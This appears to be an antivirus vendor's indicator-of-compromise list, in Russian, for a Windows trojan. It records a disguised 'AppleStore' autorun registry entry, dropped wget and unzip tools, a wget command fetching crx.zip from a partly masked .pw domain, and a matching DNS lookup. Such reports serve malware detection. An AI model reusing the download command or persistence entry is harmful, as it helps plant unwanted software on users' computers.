Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AppleStore' = '"%APPDATA%\install_browser.exe"'
- '%APPDATA%\wget.exe' -O "C:\Twains_64\11397\crx.zip" "http://www.js##date.pw/ajax/crx.zip"
- '%APPDATA%\install_browser.exe'
- %APPDATA%\unzip.exe
- C:\Twains_64\11397\crx.zip
- %APPDATA%\install_browser.exe
- %APPDATA%\wget.exe
- %APPDATA%\unzip.exe
- %APPDATA%\wget.exe
- %APPDATA%\install_browser.exe
- 'www.js##date.pw':80
- www.js##date.pw/ajax/crx.zip
- DNS ASK www.js##date.pw
- ClassName: 'Indicator' WindowName: '(null)'